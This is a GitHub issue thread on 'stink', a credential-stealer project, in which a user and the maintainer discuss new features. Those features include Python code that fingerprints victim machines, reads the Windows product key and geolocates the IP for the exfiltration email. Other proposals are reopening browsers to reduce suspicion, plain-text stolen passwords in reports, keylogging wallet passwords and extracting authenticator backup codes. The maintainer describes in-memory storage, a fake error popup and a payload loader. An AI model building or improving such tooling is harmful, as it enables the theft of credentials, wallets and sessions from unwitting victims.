FallenAstaroth / stink

🚀 Stealer on built-in libraries only, which doesn't create any temp files on data collecting, with 4 sending methods and lots of functionality.
Apache License 2.0

Summary of the collected data and browser back opening #57

Open jamiekarvans opened 8 months ago

jamiekarvans commented 8 months ago

hey, thanks for the updates, I really like how well you're expanding the application. here are some suggestions I think would be nice to implement:

  1. after Stink has finished its job, open back all the closed browsers so it raises less suspicion and looks more real

  2. add some info and a summary of what is grabbed to the sender, for example for the email sender:

        computerOS = subprocess.run('wmic os get Caption', capture_output=True, shell=True).stdout.decode(
            errors='ignore').strip().splitlines()
        computerOS = computerOS[2].strip() if len(computerOS) >= 2 else 'Unable to detect OS'
        totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', capture_output=True,
                                     shell=True).stdout.decode(errors='ignore').strip().split()
        totalMemory = str(int(int(totalMemory[1]) / 1000000000)) + ' GB' if len(
            totalMemory) >= 1 else 'Unable to detect total memory'
        uuid = subprocess.run('wmic csproduct get uuid', capture_output=True, shell=True).stdout.decode(
            errors='ignore').strip().split()
        uuid = uuid[1].strip() if len(uuid) >= 1 else 'Unable to detect UUID'
        cpu = subprocess.run(
            "powershell Get-ItemPropertyValue -Path 'HKLM:System\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name PROCESSOR_IDENTIFIER",
            capture_output=True, shell=True).stdout.decode(errors='ignore').strip() or 'Unable to detect CPU'
        gpu = subprocess.run('wmic path win32_VideoController get name', capture_output=True, shell=True).stdout.decode(
            errors='ignore').splitlines()
        gpu = gpu[2].strip() if len(gpu) >= 2 else 'Unable to detect GPU'
        productKey = subprocess.run(
            "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault",
            capture_output=True, shell=True).stdout.decode(errors='ignore').strip() or 'Unable to get product key'
        http = PoolManager(cert_reqs='CERT_NONE')
        try:
            r: dict = json.loads(
                http.request('GET', 'http://ip-api.com/json/?fields=225545').data.decode(errors='ignore'))
            if r.get('status') != 'success':
                raise Exception('Failed')
            data = f"\nIP: {r['query']}\nRegion: {r['regionName']}\nCountry: {r['country']}\nTimezone: {r['timezone']}\n\n{'Cellular Network:'.ljust(20)} {(chr(9989) if r['mobile'] else chr(10062))}\n{'Proxy/VPN:'.ljust(20)} {(chr(9989) if r['proxy'] else chr(10062))}"
            if len(r['reverse']) != 0:
                data += f"\nReverse DNS: {r['reverse']}"
        except Exception:
            ipinfo = '(Unable to get IP info)'
        else:
            ipinfo = data
        system_info = f'Computer Name: {computerName}\nComputer OS: {computerOS}\nTotal Memory: {totalMemory}\nUUID: {uuid}\nCPU: {cpu}\nGPU: {gpu}\nProduct Key: {productKey}'
        pmessage = f'System: {os.getlogin()}\nIP Info\n{ipinfo}\nSystem Info\n{system_info}'.strip()

    then add message.set_content(pmessage) to the email class. PS: I didn't know where the working directory is (where is it, btw?), but it would be nice to iterate over the grabbed data. also add the number of grabbed Telegram sessions and wallets to the email as well, to know whether it's even added or not, for example: Telegram Sessions: 1, Wallets: 4. and if the browser data or any other data is not grabbed, it would be nicer to not include that in the email text at all instead of showing that 0 were grabbed (for easier indexing and searching through emails and finding the ones that include the searched data)

  3. add the grabbed browser passwords to the grabbed info as plain text in the email as well, to organize the data better and search more easily through the grabbed info without the need to open each zip file and look for whether data was grabbed.

and again, thanks, and nice job on your new work.

FallenAstaroth commented 8 months ago

Hi, thank you)

  1. I was thinking about opening browsers back after shutdown, but tabs etc. are not saved and you still have to click the "Restore" button. But in principle it can be added.

  2. Ok, I'll add that the email should contain the results of the collection.

  3. By working directory do you mean where it saves the collected data? If yes, then nowhere: all collected data is stored in RAM, then it forms an archive in RAM and sends it to wherever it needs to go. stink does not create any temporary files while working.

FallenAstaroth commented 8 months ago

Preview of collected data added since version 4.6.0.


jamiekarvans commented 8 months ago

an amazing job, again.

there were a few things I was facing:

  1. edit: the script by default throws an error, and on some OS systems it makes the error keep looping and hangs up the system. here is the error: error_crc: Data error (cyclic redundancy check).

  2. also, in my tests stink crashes and exits if the internet connection is not up while sending data. I think it would be nice to wait for an internet connection before doing any internet-related behaviors?

  3. just an enhancement: the crypto wallets are password protected; I think it would be nice and also good practice to have an option to wait for an app or process to start and then start capturing keystrokes (for wallet EXEs, for example, or certain websites)

  4. and lastly one question: I'm just curious why you don't create temp files? are you avoiding touching the disk because of AV triggers, or ...?

FallenAstaroth commented 8 months ago

Thank you.

  1. It's a fake error. I forgot to remove the auto power on. Now it will appear only if you specify it in the parameters. What do you mean by "error keeps looping and hangs up the system"?

  2. Good idea, I'll add it.

  3. This is usually done by other people who have the equipment and so on. It's already a keylogger, and the stealer job is just to collect the data and send it. If you want to, you can load a third-party keylogger via the built-in loader.

  4. Initially it did, but I decided that it would be better to store everything in memory than to create a directory with files.

jamiekarvans commented 4 months ago

hey, long time no see, how have you been doing? I was just testing around with the code and I realized it doesn't grab Firefox passwords and cookies. also, do you think you can use the same system password to get the backup codes from authenticator extension files?